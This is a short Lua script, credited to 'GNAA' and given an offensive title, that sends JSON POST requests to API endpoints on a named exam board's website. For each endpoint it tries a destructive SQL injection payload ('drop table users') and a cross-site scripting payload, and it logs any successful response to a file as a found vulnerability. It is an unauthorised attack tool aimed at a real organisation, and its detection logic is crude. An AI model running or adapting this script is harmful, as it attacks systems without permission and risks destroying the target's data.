-- IGCSE AUTISM, GNAA
-- written by evan, maintained by interp0l
--  libs, ltn12, http, json, i/o
local http = require('socket.http')
local ltn12 = require('ltn12')
local json = require('dkjson')
local io = require('io')

local base_url = 'https://www.edexcel.com'
local domains = {'www', 'qualifications', 'qualhub', 'bsl', 'awarding', 'training'}
local endpoints = {'/api/user', '/api/order', '/api/course'}


function scanForVulnerabilities()
  for i = 1, #domains do
    for j = 1, #endpoints do
      local payloads = {
        {id = 123456789, action = 'view'},
        {id = '1; drop table users; --', action = 'delete'},
        {id = '<script>alert("Vulnerability found!")</script>', action = 'edit'}
      }

      for k = 1, #payloads do
        local payload_json = json.encode(payloads[k])
        local response_body = {}
        local request_body = ltn12.source.string(payload_json)
        local request_headers = {
          ['Content-Type'] = 'application/json',
          ['Content-Length'] = tostring(#payload_json)
        }
        local response, status_code, response_headers = http.request {
          method = 'POST',
          url = base_url .. '/' .. domains[i] .. endpoints[j],
          headers = request_headers,
          source = request_body,
          sink = ltn12.sink.table(response_body)
        }
        if status_code >= 200 and status_code < 300 then
          print('Vulnerability found on ' .. base_url .. '/' .. domains[i] .. endpoints[j] .. ' with payload ' .. payload_json)
          local file = io.open('vulnerabilities.txt', 'a')
          file:write(base_url .. '/' .. domains[i] .. endpoints[j] .. ' - Payload: ' .. payload_json .. '\n')
          file:close()
        end
      end
    end
  end
end


scanForVulnerabilities() -- shit func namespace but idc lol